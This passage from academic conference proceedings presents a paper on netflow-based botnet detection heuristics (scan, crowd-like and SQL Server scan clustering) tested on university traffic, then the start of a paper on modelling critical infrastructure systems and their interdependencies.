networks, focusing in botnet activity detection through behavior, numerical and heuristic modeling. Different types of
botnets (IRC, P2P, HTTP, fast-flux among others) are initially analyzed followed by the study of some existing
detection techniques and tools like Honeynet, Botsniffer and Botminner. Following this initial study, numerical and
heuristic aspects of both normal and bot traffic are investigated. Finally, a set of traffic parameters is proposed aiming
fast and precise botnet detection, with low false positive rate.
Keywords: Botnet detection, anomaly-based, heuristics, numerical, behavior
1. Introduction
Internet security has been targeted in innumerous ways throughout the ages. Concerning attack tools,
the combination of many well known techniques has been making botnets an untraceable, effective,
dynamic and powerful mean to perpetrate all kinds of malicious activities such as Distributed Denial of
Service (DDoS) attacks, espionage, email spam, malware spreading, data theft, click and identity frauds,
among others (Mielke & H. Chen 2008).
The detection of bots (sometimes called zombies or drones when referring to the machines infected) and
botnets become critical, and can be made using three distinct methodologies: cooperative behavior
analysis, signature analysis and attack behavior analysis (Bailey et al. 2009). This paper will focus on the
first two approaches having in mind that botnet detection should be time-efficient (Jing et al. 2009).
Objectively, this paper pretends to contribute to botnet detection and tracking, by just analyzing network
behavior. The advantage of such an approach is its relative simplicity and possible operation in a network
core ideally with no packet and no host-based inspections. Either centralized or decentralized botnets
can be detected using such an approach though distinct traffic features must be considered for each
topology.
The reminder of this paper is organized as follows: in section 2 we present some of the work done on
anomaly-based botnet detection and characterization. In section 3 we analyze several possible network
metrics and correlations having in mind fast and precise botnet detection. Section 4 describes the
research patterns followed along with the tools used and already developed to support the analysis
framework created. Also in this section, tests and corresponding results on some anomaly detection
vectors are analyzed in order to propose a detection model. A conclusion is then presented along with
the discussion of this model’s possible detection difficulties and ways to improve it.
2. Related work
The analysis of botnet network behavior is a relatively recent research area but has already produced
some interesting and coherent results. Some of these researches are next presented.
BotHunter (Guofei Gu et al. 2007) tracks communication flows between internal and external hosts
correlating them to IDS events in order to effectively detect internal host malware infections.
185

Luís Mendonça and Henrique Santos
BotSniffer (G. Gu, Zhang, et al. 2008) uses statistical algorithms to analyze topology- centric botnets and
detect their hosts crowd-like behaviors. BotSniffer work was complemented with BotMinner (G. Gu,
Perdisci, et al. 2008), where a correlation between C&C (Command and Control) communication and
corresponding malicious activity is also established.
In (Akiyama 2007) three metrics are proposed to detect a botnet cooperative behavior: relationship,
response and synchronization. On the other hand, Strayer manages to establish a correlation between
inter-arrival time and packet size (Strayer et al. 2008).
BotCop (W. Lu & Tavallaee 2009) analyses the temporal-frequent characteristic of flows to differentiate
the malicious communication traffic created by bots from normal traffic generated by human beings. The
work done in (Karasaridis et al. 2007) contributes to the botnet detection research by establishing a
distance metric between a pre-defined IRC botnet traffic model and passively collected network traffic
(flows).
However, distinct approaches from the aforementioned botnet detection vectors exist: DNS traffic
analysis is one of them. This detection vector was explored in (Villamarin-Salomón & Brustoloni 2008),
(Morales et al. 2010), (Choi et al. 2007) and by BotXRayer (I. Kim et al. 2009).
Another important area of botnet detection research is botnet measuring and characterization. In (Dagon
& G. Gu 2007) the authors made an important contribution to this research by presenting a model for
botnet operation and size estimation. On the characterization side, Honeynets and honeypots keep the
lead in the bot hijacking processes allowing researchers to deeply study bot code and modus-operandi.
3. Botnet anomaly-based detection
Any bot master needs to control his army of bots in some way. Thus, a command and control (C&C)
channel needs to be established in order to instruct the bots of their actions (scan, recruit, upgrade,
attack and others). C&C channels can be created using either centralized (IRC or HTTP) or decentralized
(P2P, unstructured or fast-flux networks) architectures (Zhu et al. 2008). In (Dagon & G. Gu 2007) it is
confirmed that C&C is often the weak link of a botnet, although C&C-oriented botnet disruption wouldn’t
always be the best approach.
Although the use of known and stable C&C channels is still preferred by botmasters on the basis of
stability, new types of C&C channels are constantly being implemented in order to evade existing
detection techniques. The use of Twitter servers and RSS feeds service are some examples (Estrada &
Nakao 2010). Any new type of C&C will be invisible to simple comparisons with pre-determined models of
botnet operation. The use of behavior analysis and correlation is, therefore, fundamental to correctly
identify such dynamic and dissimulated botnets.
There are many traffic data sources that can be used to detect network anomalous usage and botnet
activity. Among these we can find DNS Data, Netflow Data, Packet Tap Data, Address Allocation Data,
Honeypot Data and Host Data (Bailey et al. 2009).
In order to allow the proposed system to operate in large networks, this analysis will focus on the study of
netflows as this kind of data is simpler and faster to process than other types mentioned. Honeypot Data
and Packet Tap Data require heavier and slower processing while Host Data analysis fall into the
category of anti-virus protection systems. Furthermore, many supervised networks already implement
netflow logging which could, in turn, contribute to an easier implementation of the detection system
proposed. The use of netflows is also welcome when dealing with traffic privacy issues. The major
drawback of this approach is the loss of some traffic characterization details.
Several botnet features can be used in order to determine bot-related anomalous network activities:
relationship, response and synchronization are some of them. Correlations can be established between
these features by analyzing all visible hosts’ activity in a pre-determined period and can be established in
both vertical and horizontal vectors.
Vertical correlation uses the information captured from one single host activities in order to identify its
botnet membership and malicious intents. Horizontal correlation, on the other hand, exploits the
synchronized behavior of several hosts belonging to the same botnet (Estrada & Nakao 2010). Vertical
correlations can be established, in theory, through the detection of anomalous responses to known
186

Luís Mendonça and Henrique Santos
request/response pairs. Though being feasible, used alone, this method can be very sensitive and prone
to produce high false positive rate.
Many flow-based correlations can be established, such as the number of bytes and packets per host, port
and flow; the number of different IPs and ports contacted by a host and the host’s flow interval and
duration. These correlations are able to identify network scans, flash-crowd behaviors as well as other
anomalous network events.
The netflow analysis approach method proposed in this paper is similar to systems like BotMiner and
BotSniffer but its time-efficiency goal really differentiates it from the others.
While BotMiner and BotSniffer algorithms focuses mainly on the attack phase, this approach starts its
detection analysis in the initials host infection and bot scanning phases.
Similarly to other botnet detection systems, the goal of the proposed analysis is not the detection of
single infected hosts but the detection of specific global network anomalies that can lead to the
identification of coordinated hosts’ activity relative to botnet operation.
4. Behavior analysis, experimental setup and results
This section presents the current bot and botnet behaviors under analysis and the corresponding
measurable characteristics that are capable of botnet activity detection. Some of the heuristics proposed
are then tested using the developed analysis framework. A detection model is then presented.
4.1 Bot Behavior
In order to recruit more bots for a botnet, every zombie scans the network looking for vulnerable hosts to
proper malware installation. This behavior should be the first one to produce clear evidence of possible
bot activity and is independent of botnet type (HTTP, IRC, P2P, or other).
Normally, scan activity targets few ports within a specific host always having in mind specific
vulnerabilities. HTTP servers, per example, normally respond to HTTP, HTTPS and, possibly, FTP
requests (three ports). Other much stealthier types of scanning can be found in the internet. The
verification of single port connectivity on specific and targeted hosts (using a list shared by bots), is one
possibility among many others. Thus, scanning activity can be detected by monitoring host port and IP
connection rates.
Other ways of distinguishing bot activity from normal network use involves the study of bot automate
behavior. Bot C&C connections are normally established using a fixed time rate (W. Lu & Tavallaee
2009). Though some bots can make its C&C connections randomly, this can reduce the response time of
the botnet. Fixed time connection rates can be detected by analyzing the temporal characteristics of
netflows, for example.
Another characteristic of bot automate behavior can be found in the similarity of its network flows in terms
of packets’ size and count.
4.2 Botnet behavior
Now that some bot behaviors are defined, it is important to establish a botnet behavior model. This can
be achieved by observing the holistic property of a botnet. When observed together, though
independents, bots behave like a single intelligent entity. This synchronized and related behavior must
exist so the botnet can be useful to the botmaster (from scan to attack activity). Thus, similar and
synchronized network traffic should be strong evidence of botnet activity.
4.3 Netflows numerical and statistical analysis
Several numerical properties are available in network flows, or can be easily derived, in order to detect
botnet activity. Basic attributes of most netflows formats include flow start and end time, source IP and
port, destination IP and port, bytes and packets in the flow, as well as the protocol used. The numerical
analysis of netflows must, then, be based on the study of such attributes and their possible
relations/dependencies. All these attributes can be used to cluster collected netflows or calculate a host’s
associated entropy.
187

Luís Mendonça and Henrique Santos
Clustering can be based on simple attributes or using composed ones. Some examples of composed
attributes are the bytes per packet, bytes per source host, or the flow time interval by host, among others.
Several classification and clustering methods can be used. K-means and X-means (G. Gu, Perdisci, et al.
2008), Cosine distance, Euclidean distance, Earth Mover’s distance (EMD), Kullback-Leibler asymmetric
distance, term frequency / inverse document frequency (TF/IDF), J48 decision trees, Naïve Bayes and
Bayesian Networks (Karasaridis et al. 2007) are some of them.
Entropy estimation is also useful for botnet detection in the way that it can tell how much randomness is
involved in the traffic observed. Hosts behaving similarly will have equivalent entropy values. Bot scan
activity, for example, will certainly have low IP/port distribution entropy. Shannon’s entropy or other
generalized entropies such as defined by Renyi and Tsallis can be used in traffic characterization and
anomaly detection (Tellenbach et al. 2009). Tsallis entropy is given by the following expression:
Since Tsallis entropy is better suited for non-Gaussian measures (Tellenbach et al. 2009) it will be used
in this study to analyze contacted IPs and ports, connections time interval and bytes/packets per flow.
After clustering or entropy calculations are made, thresholds must be applied in order to define which
host or traffic represents an anomalous event. This selection is prone to produce type I and II statistical
errors represented in the form of false positive and negative rates.
In that way, both parameter and threshold definitions play a critical role concerning the detection
efficiency, in particularly false alarms miss detection and the balance between false positives and
negatives.
4.4 Analysis framework
In order to develop and test the proposed heuristics, several tools were used: Nfdump project tools
(Nfdump 2010) allowed the capture and initial flow parsing; Microsoft SQL Server (Microsoft 2011c),
Analysis Services (Microsoft 2011a) and Reporting Services (Microsoft 2011b) provided flow storage,
processing, charting and statistical analysis; and, finally, BotAnalytics (developed in C# during this
research) allowed the import of all collected netflows into an SQL Server database.
To allow the injection of bot traffic (currently only available in pcap dump format) into the netflow
database, a feature was implemented in BotAnalytics that permitted the conversion of dump capture files
into flows and corresponding insertion into the SQL Server Database. This conversion was made by
aggregating the captured packets into a unidirectional five tuple record (Source IP, Source Port,
Destination IP, Destination Port and Protocol) with corresponding number of packets, bytes, start and end
time of the flow. A flow aging mechanism was also introduced in the pcap dump import feature that
automatically determined the end of a flow when, for an active five tuple record, a packet wasn’t seen for,
at least, sixty seconds.
The (initially assumed benign) traffic datasets used in this research were captured in the University of
Minho network edge. They were collected and parsed using nfdump tools before being imported into the
SQL database by BotAnalytics (internal proxy and DNS servers traffic was excluded at this time for the
sake of analysis simplicity). Nfdump tools were installed in a server connected to a mirrored port of a
switch at the edge of the campi network. All traffic entering and leaving the university’s network was
captured.
All this initial heuristics validation and development were made on a specific dataset representing the
University of Minho UDP and TCP traffic on the 11 th January 2011. More than thirty million flows were
imported, at this time, into de SQL Server database.
4.5 Scan detection heuristic
Scan detection is a common feature in IDS systems. Many possible detection approaches are possible to
be implemented using statistical flow analysis. This paper presents one of the approaches currently
188

Luís Mendonça and Henrique Santos
under study. The goal of scan detection in the context of botnet activity detection is the identification of
suspicious hosts that can later be observed in more detail applying, cumulatively, a wider set of heuristics
in order to identify a botnet and its constituent hosts.
Modeling scan behavior was the first step taken to develop detection capable heuristics. Scan activity
flows were assumed to have small packets (few bytes) with high number of destination ports and IPs
involved within a relatively short period of time. In order to verify this behavior on the captured traffic, for
each source IP and ten minute period, the number of distinct IPs and ports were counted. The result was
then filtered using the Distinct Destination IPs (DDIP) and Port/IP Ratio (PIR) thresholds. PIR is
calculated by dividing the number of distinct ports per distinct IPs contacted. These criteria preserved
only flows with high distinct destination IPs and ports contacted. The result was then filtered by a
Bytes/Packets Ratio (BPR) threshold, aiming to keep only traffic with small packets involved. The chart
presented in Figure 1, shows the number of distinct source IPs with scan-like activity. It was built with a
BPR of 100 bytes, and both DDIP and PIR of 5.
Figure 1: Number of distinct hosts with scan-like activity
The development of this initial scan heuristic allowed to get a closer contact with the problem but didn’t
brought forward, per se, anomalous activity. Better results were achieved when aiming the study at
specific application traffic as seen in the last heuristic presented in this paper.
4.6 Crowd-like behavior heuristic
The crowd-like behavior heuristic was developed with the following observation in mind: flows with the
same number of bytes and packets sent from many distinct hosts, during a relatively small time interval,
are possibly related and very alike to what a botnet activity would produce. Based on this assumption,
and for each ten minute period, all the UDP and TCP flows with less than 1000 bytes and with the same
number of packets and bytes where grouped. At this stage, every source IP with only one packet in the
cluster was removed in order to filter out IPs with small contribution to the cluster. The 1000 bytes limit
selection was based on the assumption that botnet communication is based on small packet exchanges
(Strayer et al. 2008). Large bandwidth is commonly associated with bulk transfers or downloads. The
resulting clusters thus contained hosts with similar flow characteristics. The next step was to eliminate the
clusters having less than five IPs. This threshold criterion was assumed after analyzing the resulting
clusters content. Port usage analysis made clear that a vast majority of its flows were related to NTP and
DNS usage making such clusters not important to this analysis.
Some clusters were then excluded based on their relevance. A cluster was considered relevant if its
information was useful. Clusters with the majority of the source IPs seen in the ten minute period could
not be considered relevant since they contained probably normal traffic. For this matter, an Environment
189

Luís Mendonça and Henrique Santos
Ratio (ER) and Threshold (ET) were defined. ER was determined by the ratio between distinct hosts in
the cluster versus the total distinct hosts in the ten minute period under analysis. The ET used in this
initial research was 0.001 and it was selected after carefully analyzing the clusters created and verifying
again that clusters having ER higher than the selected ET (0.001) represented normal traffic (DNS, NTP).
Figure 2 shows a chart representing the number of distinct source IPs (size of the bubbles) with filtered
flows having the same number of bytes and packets between 12:05 and 12:15 of the 11 th January 2011.
Two quick remarks can be done whilst observing the chart: no flows could be found with less than 378
bytes and more than 8 packets, and there were large clusters in the bottom left corner of the chart
revealing the existence of many hosts with similar flows having few, small packets.
Figure 2: Distinct source IPs per number of bytes and packets
Finally, and for a ten minute period, a Clustering Score (CT) was determined for each IP. CT was
calculated by counting the number of crowd-like clusters an IP belonged to. All the IPs with a CT below 5
and, thus, with less crowd-like behavior, were filtered out at this stage. All the thresholds and
corresponding values here presented were used mainly for model and heuristic validation and are still
under analysis. The chart in Figure 3 shows us, for each ten minute period, the number of distinct source
IPs belonging to suspicious clusters. Each of these hosts thus possesses crowd-like behavior.
Figure 3: Number of distinct source IPs with crowd-like behavior per ten-minute period
190

Luís Mendonça and Henrique Santos
This data brought forward some interesting events when drilled down. The majority of the hosts detected
with crowd like behavior revealed a high connection rate on unusual ports and with IPs scattered along
geographically dispersed IPs. Further investigation is now necessary to distinguish if these anomalous
flows represented malicious activities.
4.7 Crowd-like SQL server scan behavior heuristic
The last heuristic presented is a much more targeted one since it is directed to a specific protocol and
application behaviors analysis. SQL is a very important source of application vulnerabilities, which makes
SQL Server port scans very common. An existing buffer overflow bug in Microsoft SQL Server turned this
application into the spreading mean for the Slammer Worm for example.
The goal of this analysis was to model specific scan behaviors. To find out if - and how - SQL Server
oriented scan activity were being done in the campus’ network, all the flows not directed to SQL Server
ports (1423 and 1433) or with more than 1000 bytes, were filtered out. Note that according to university’s
security policy it would be anomalous the existence of SQL Server connections with hosts outside the
university’s network.
Several such scans were found on the 11 th of January 2011. The chart in Figure 4 shows the number of
distinct IPs with connections (or attempts) to SQL Server ports related to the average bytes per packet
used in the connection, during the day. It was possible to observe that most scan traffic had small bytes
per packet ratio (BPR) and that this ratio didn’t go beyond the 300 bytes.
Figure 4: Number of distinct hosts connecting to SQL server ports per bytes per packet
Table 1: Top 5 bytes per packet clusters with higher SQL Server scan activity
Bytes per Packet Number of Distinct source IPs
48 426
40 49
52 25
44 10
46 7
The following step was to analyze in detail each host involved in the scanning, trying to model scan
activities and, at the same time, detect crowd-like behaviors. Three important scan methodologies were
found in the analysis of this traffic dataset: aggressive (ten thousand IPs scanned in ten minutes by one
single host), constant (nine IPs scanned throughout the day in each ten minute period by a single host)
191

Luís Mendonça and Henrique Santos
and distributed (more than forty hosts scanning a different sets of IPs with a rate of one IP scanned per
five minute period).
A crowd-like behavior could be established in this distributed scanning. Besides having a time-related
correlation (five minute fixed scanning interval, all of the hosts were geographically close and scanned
different sets of IPs. This final characteristic was the final proof of their cooperative behavior.
4.8 Detection model
The botnet detection model under study is currently considered to be based on two vectors: scanning
activity and crowd-like behaviors analysis. Suspicious hosts are first identified by the scan activity vector
so they can have their network behavior thoroughly analyzed. Botnet activity identification is made
whenever synchronized and similar flows are exchanged by many different suspicious hosts.
This model has the potential to detect all types of botnets. Traffic features such as the size and number of
packets can be used to detect bot activity or crowd-behavior in both centralized and decentralized botnet
topologies.
5. Conclusions and future work
A hard and bendy road ahead is still waiting but the preliminary results achieved are great contributions
to a better knowledge of the problem. It was proved, though, that it is possible to detect network
anomalies by solely analyzing netflow attributes.
The biggest challenges found up to this moment were collecting, filtering and analyzing large size traffic
datasets. Many different netflows formats were found in the first datasets collected (nfdump, flow-tools
(Flow-tools 2010) and others) which made their study a hard task. New tools must now be tested and,
perhaps, developed in order to simplify such tasks.
For the sake of system configuration and management, more thresholds must also be defined to allow
the adaptation of present and future heuristics to different supervised networks. Every network
administrator must have in mind that these threshold configurations are very sensitive and should be
correctly defined in order to balance true and false positive detection rates.
Although the heuristics proposed in this paper lack further investigation and development, they were able
to pinpoint some important network events that, when drilled-down, presented real deviations from the
normal network traffic. To determine if such anomalies represent real, botnet-related, malicious traffic, is
still a work to be done.
The greatest contribution made by this initial analysis to future work was the conclusion that, the search
for network anomalies must be oriented by a previous classification and characterization of the traffic
under analysis (protocols and ports for example). The search for a wide spectrum anomaly model is
prone to failure since each protocol and application has its own specific behaviors. In nature, it would be
like finding animal anomalies by simply checking a predetermined characteristic like the existence of fur.
The inexistence of fur is normal in some animals but not in others.
The injection of real bot traffic will certainly be a necessary step to further validate and enhance the
current proposed heuristics as well as to establish new ones.
Next steps will include the development of new robust application-oriented heuristics, the creation of an
effective event drill-down algorithm with false positive rate reduction in mind and, finally, a botnet host’s
identification method based on such algorithms.
The development of new tools and methods is also needed in order to allow real implementations of a
system. The defined test bed and the tools used and developed (BotAnalytics, Reports and Analysis
Services Projects) were important for off-line analysis and understanding of the botnet traffic
phenomenon but not quite efficient for real-time detection.
Even if developed detection systems are not enough to stop botnet activity perhaps there will be a point
in time where the investment made on building a botnet won’t payoff anymore. This is the greatest
motivation of this research.
192

Luís Mendonça and Henrique Santos
In the end, it will be virtually impossible to detect a botnet whose bots mimic normal host behavior. But a
bot behaving as normal host can’t be that malicious.
Acknowledgements
This research has been possible thanks to the cooperation of the Communications Services of University
of Minho.
References
Akiyama, M., 2007. A proposal of metrics for botnet detection based on its cooperative behavior. 2007 International
Symposium on Applications and the Internet Workshops (SAINTW’07).
Bailey, M. et al., 2009. A survey of botnet technology and defenses. In Conference For Homeland Security, 2009.
CATCH’09. Cybersecurity Applications & Technology. IEEE, p. 299–304.
Choi, H., Lee, H. & Kim, H., 2007. Botnet detection by monitoring group activities in DNS traffic. In Computer and
Information Technology, 2007. CIT 2007. 7th IEEE International Conference on. IEEE, p. 715–720.
Dagon, D. & Gu, G., 2007. A taxonomy of botnet structures. Twenty-Third Annual Computer Security Applications
Conference (ACSAC 2007).
Estrada, V.C. & Nakao, A., 2010. A Survey on the Use of Traffic Traces to Battle Internet Threats. 2010 Third
International Conference on Knowledge Discovery and Data Mining on Knowledge Discovery and Data Mining.
Flow-tools, 2010. Flow-tools project webpage. Available at: http://code.google.com/p/flow-tools/ [Accessed January
3, 2011].
Gu, G. et al., 2008. BotMiner: Clustering analysis of network traffic for protocol-and structure-independent botnet
detection. In Proceedings of the 17th conference on Security symposium. USENIX Association, p. 139–154.
Gu, G., Zhang, J. & Lee, W., 2008. BotSniffer: Detecting botnet command and control channels in network traffic. In
Proceedings of the 15th Annual Network and Distributed System Security Symposium (NDSS’08).
Gu, Guofei et al., 2007. BotHunter: detecting malware infection through IDS-driven dialog correlation. In Proceedings
of 16th USENIX Security Symposium on USENIX Security Symposium. Berkeley: USENIX Association, p.
12:1–12:16.
Jing, L. et al., 2009. Botnet: Classification, attacks, detection, tracing, and preventive measures. EURASIP journal on
wireless communications and networking, 2009.
Karasaridis, A., Rexroad, B. & Hoeflin, D., 2007. Wide-scale botnet detection and characterization. In Proceedings of
the first conference on First Workshop on Hot Topics in Understanding Botnets. USENIX Association, p. 7.
Kim, I., Choi, H. & Lee, H., 2009. BotXrayer: Exposing Botnets by Visualizing DNS Traffic.
Lu, W. & Tavallaee, M., 2009. BotCop: An online botnet traffic classifier. 2009 Seventh Annual Communications
Networks and Services Research Conference.
Microsoft, 2011a. Microsoft Analysis Services 2008. Available at:
http://www.microsoft.com/sqlserver/2008/en/us/analysis-services.aspx [Accessed January 5, 2011].
Microsoft, 2011b. Microsoft Reporting Services 2008. Available at:
http://www.microsoft.com/sqlserver/2008/en/us/reporting.aspx [Accessed January 5, 2011].
Microsoft, 2011c. Microsoft SQL Server 2008. Available at: http://www.microsoft.com/sqlserver/en/us/default.aspx
[Accessed January 5, 2011].
Mielke, C. & Chen, H., 2008. Botnets, and the cybercriminal underground. In Intelligence and Security Informatics,
2008. ISI 2008. IEEE International Conference on. IEEE, p. 206–211.
Morales, J.A. et al., 2010. Analyzing DNS activities of bot processes. In Malicious and Unwanted Software
(MALWARE), 2009 4th International Conference on. IEEE, p. 98–103.
Nfdump, 2010. Nfdump tools webpage. Available at: http://nfdump.sourceforge.net/ [Accessed January 3, 2011].
Strayer, W.T. et al., 2008. Botnet detection based on network behavior. Botnet Detection, p.1–24.
Tellenbach, B. et al., 2009. Beyond shannon: Characterizing internet traffic with generalized entropy metrics. Passive
and Active Network Measurement.
Villamarin-Salomón, R. & Brustoloni, J.C., 2008. Identifying botnets using anomaly detection techniques applied to
DNS traffic. In Consumer Communications and Networking Conference, 2008. CCNC 2008. 5th IEEE. IEEE, p.
476–481.
Zhu, Z. et al., 2008. Botnet research survey. In Computer Software and Applications, 2008. COMPSAC’08. 32nd
Annual IEEE International. IEEE, p. 967–972.
193

Analysis and Modelling of Critical Infrastructure Systems
Graeme Pye and Matthew Warren
Deakin University, Geelong, Australia
graeme@deakin.edu.au
mwarren@deakin.edu.au
Abstract: The increasing complexity and interconnectedness of critical infrastructure systems, including the
information systems and communication networks that support their existence and functionality, poses questions and
challenges. Particularly, in terms of modelling and analysis of the security, survivability and ultimately reliability and
continued availability of critical infrastructure systems and the services they deliver to modern society. The focus of
this research enquiry is with regard to critiquing and modelling critical infrastructure systems. There are numerous
systems analyse and modelling approaches that outline any number of differing methodological approaches, each
with their own characteristics, expertise, strengths and weaknesses. The intention of this research is to investigate
the merit of applying a ‘softer’ approach to critical infrastructure system security analysis and modelling that broadly
views the systems in holistic terms, including their relationships with other systems. The intention is not to discuss or
criticise existing research applying quantitative approaches, but to discuss a ‘softer’ system analysis and modelling
approach in a security context that is adaptable to analysis modelling of critical infrastructure systems.
Keywords: critical infrastructure, security analysis, systems modelling
1. Introduction
The interactive nature and characteristics of critical infrastructure systems presents several theoretical
and practical challenges to modelling, prediction, simulation and analysis of the causal behaviours and
security factors both within and between mixes of differing system types. Furthermore, understanding the
potential impacts of interdependency relationships as infrastructures evolve and change in operational
regulations governing critical infrastructure systems is an important consideration (Brown et al 2004). The
interactions and responses are neither universally applicable nor transferable between independent,
single critical infrastructure systems or interconnected multiple system configurations. Critical
infrastructure systems comprise a heterogeneous mixture of dynamic, interactive, non-linear elements,
unscheduled discontinuations and numerous other influential impositions and behaviours (Macdonald &
Bologna 2003). These configurations and behaviours present significant challenges to the security
analysis and modelling of critical infrastructure systems.
2. System analysis and modelling considerations
Systems generally consist of a collection of lower level elements or subsystems that work together in a
cooperative manner toward the greater overarching goal of the system. Furthermore, the characteristics
of systems vary considerably and are largely the result of the type of system, open or closed, and the
external environment that interacts and influences system functionality generally. Additionally, the
relationships and influences exerted between subsystems also have a part to play in comprehending the
subject system’s functionality and responses to differing circumstances.
2.1 System modelling themes
In general terms, applying the system security analysis or system modelling approaches to represent an
interpretive conceptualisation of a real-world system (Berntsen et al nd) provides a means of viewing the
important aspects or essence of the system at various levels, depending on the particular system
modelling theme.
For example, other common system modelling and analysis themes are as follows (Avison 2003a):
A three-level view, where the conceptual level is a descriptive high-level overview of the system
domain, the logical level describing the system goals and intention, while the physical level describes
the system itself including the technologies involved.
Process modelling theme describes the logical analysis of the processes within the system and is a
discipline that applies a basic technique of functional decomposition, which breaks down a complex
problem into smaller, more manageable detail.
Data analysis theme involves comprehending and documenting the data elements and their
relationships within the system.
194

Graeme Pye and Matthew Warren
Object-orientated theme models objects that represent elements of the system including people,
data, processes and the interaction of these objects.
These themes are each applicable to general system analysis or modelling in the terms of their specific
characteristics of application, however there is no singular theme directly applicable for critiquing and
modelling critical infrastructure systems.
2.2 Blending methodological approaches
As Avison (2003b) outlines, methodologies provide a set detailed rules and guidelines to follow and work
to that deliver a highly structured design approach to the specific task they are to address. Therefore, in
the logical extension lies in utilising a number of individual themes or approaches in combination, to bring
together characteristics of each specific method to provide specific expertise to meet the overall practical
criteria and intention of critiquing and modelling of critical infrastructure systems (Wood-Harper et al
1985).
Therefore, a blended methodological approach utilising multiple system analysis and system modelling
approaches in combination would conceivably bring together the characteristics of each that is applicable
to achieving the overall goal of critiquing and modelling critical infrastructure systems.
2.3 System analysis modelling
Other modelling approaches related to information system analysis that Dennis et al (2009) discusses are
as follows:
Functional modelling is a description of the processes and the interaction of the system with its
environment.
Structural modelling is a conceptual description of the structure of the data supporting the processes
and presents the logical organisation of data without focussing on the technical details of how the
data is stored, created or manipulated.
Behavioural modelling describes the internal dynamic aspects of a system that support the processes
by describing the internal logic of the processes without specifying the process implementation.
While these approaches may not necessarily be directly applicable to this research, in terms of critiquing
and modelling critical infrastructure systems there are elements of these approaches that are
complimentary to system analysis and the principles of system modelling.
The principle intention of system security analysis is to determine an intricate understanding of the focal
systems to identify and monitor potential system vulnerabilities and develop solutions. An additional
approach to enhance the insights gained from system analysis into the functional characteristics, security
and structural features of systems is to develop a model of the subject system that conceptually
represents the focal, real-world system of interest for further investigation.
3. Analysis and modelling: The challenges
The challenges of analysing and modelling such large-scale systems, including their dependency
relationships with other systems and their non-linear and time-dependent behaviour, remain largely
undetermined. According to McDonald and Bologna (2003), mathematical models of critical infrastructure
systems are vague and there are no applicable methodologies for assessing and comprehending the
intricacies of critical infrastructure systems. Add to this the effects of human interaction, from both the
perspective of a susceptibility to instigate failure and adaptability to manage and recover wayward
systems. This requires that modelling these networked critical infrastructure systems is not only about
modelling the subject system itself, but incorporating consequential rationality of actual human thinking,
responses and reactions, including the topology and dynamics of these large complex network systems
(Macdonald & Bologna ibid, Peters et al 2008).
Furthermore, there are additional complexity factors with network systems that are inherently difficult to
comprehend (McDonald & Bologna 2003):
Structural complexity – increasing number of nodes and links between nodes;
Network evolution – the structural linkage which could change over time;
195

Graeme Pye and Matthew Warren
Connection diversity – the links between nodes could have different weightings, directions or
capacities;
Dynamical complexity – the nodes could be non-linear dynamical systems;
Node diversity – there could be many different node types; and
Meta-complication – the various complications can influence other network nodes.
Add to this the fact that critical infrastructures can be intractable systems that are difficult to manage,
operate and maintain with large, physical and geographically distributed systems that are highly diverse.
Typically consisting of networked components or ‘systems within systems’ structures and various
performance variations; there are few modelling mediums that can characterise these infrastructures as
whole systems (Schulman & Roe 2007).
However, critical infrastructure analysis and modelling utilising simulation and optimisation-based
techniques have played a significant part in examining potential interdiction impacts, recognising the
insights they provide for mitigating facility loss and prioritising security strengthening efforts. Thus
proposing that simulation as an optimisation technique, has generally proven valuable in the analysis of
vulnerabilities in critical infrastructure networks, system simulations can enable the examination of a
range of impacts, with either implicit or explicit notions of optimising performance (Murray & Grubesic
2007). Therefore, in the context of assessing system potentiality, reliability and vulnerability through
monitoring the simulation models of networks as nodes or links that are compromised, enables
corresponding changes in connectivity or performance to be documented.
A final important consideration for modelling critical infrastructure systems is the interdependency
relationships that exist between differing critical infrastructure systems. Mussington (2002) identifies
these relationships as a point at which a shortfall of knowledge for improving critical infrastructure
security capabilities is incomplete and suggests that part of the problem is the complexity of relationships
that is difficult to model. However, Brown et al (2004) recognises that modelling is a first step in
analysing, identifying and answering persistent questions about the potential of ‘real’ critical infrastructure
system vulnerabilities.
For example, modelling critical infrastructure systems and the dependent and interdependent
relationships or influences between infrastructures can deliver structural insight. Pederson et al (2006)
provides a representation of differing infrastructures and their interdependent relationships and likely
response connections based on a flooding event scenario that draws a parallel with Hurricane Katrina in
New Orleans. In Figure 1 the individual infrastructure networks are represented on a single plane and the
parallel lines within each plane represent sectors and sub sectors within that particular infrastructure. The
spheres or nodes represent key infrastructure components within that sector; for instance, the energy
sector contains electricity generation and distribution and natural gas production and distribution.
Dependencies can exist within each infrastructure and between differing internal sectors. The solid lines
crossing sectors within a specific infrastructure represent internal dependencies and the broken lines
between different infrastructures represent dependencies that can also exist between different
infrastructures or infrastructure interdependencies.
Figure 1 illustrates where the dependencies and interdependencies exist within the greater infrastructure
system and highlights where dependency relationships exist and the inherent and potential complexity
these relationships bring to infrastructures. Additionally, a model of this nature enables those attempting
to manage the chaotic environments of disasters and emergency response during catastrophic events to
gain a clear appreciation for where these relationships exist both within and between critical infrastructure
systems. Understanding this is important for emergency response decision-makers and agencies
responsible for recovery, rescue and restoration purposes because a failure to understand these
dynamics would result in poor coordination and an ineffective response. Thereby, resulting in the
mismanagement of resources, including supplies, rescue personnel and security teams that may
generate a loss of public confidence or trust and at worst, loss of human life (Brown et al 2004, Pederson
et al 2006).
The analysis and modelling of critical infrastructure systems also offers the potential to determine
interdependencies that are susceptible to cascading failures and identifying the divergent systems
characteristics likely to exacerbate such interconnected infrastructure failures. Particularly, where the
consumption of services is virtually immediate and no buffering or reserve of resources exists within
196

Graeme Pye and Matthew Warren
infrastructures such as telecommunications and electricity grids, this immediacy of resource consumption
can lead to potentially instantaneous cascading failures that impact across interdependent critical
infrastructure systems. Alternatively, other infrastructures that exhibit buffering characteristics similar to
fuel and gas production and distribution infrastructures that supply physical resources have a level of
reserve within these systems where any failure would not necessarily be instantaneous in its effect, but
the effects would exacerbate over time (Svendsen & Wolthusen 2007). These differences in scenario
circumstances and the characteristics of the critical infrastructure systems involved would by necessity
require careful consideration in a modelling context. Particularly, when seeking to identify, predict and
even quantify the effects of cascading incidents among interdependent infrastructure systems. This would
add informative value with regard to developing public policies that aim to address critical infrastructure
vulnerabilities and especially those that relate to critical infrastructure system security (Zimmerman &
Restrepo 2006).
Figure 1: Infrastructure interdependencies (Pederson et al 2006)
As an alternative approach, Little (2003) suggests that applying analysis and modelling techniques to
historical critical infrastructure incidents and events would enable incremental improvements in
prediction, forecasting and preparedness for future events and allows the instigation of new engineering
approaches to design and construction. Thus, enabling critical infrastructure systems to become more
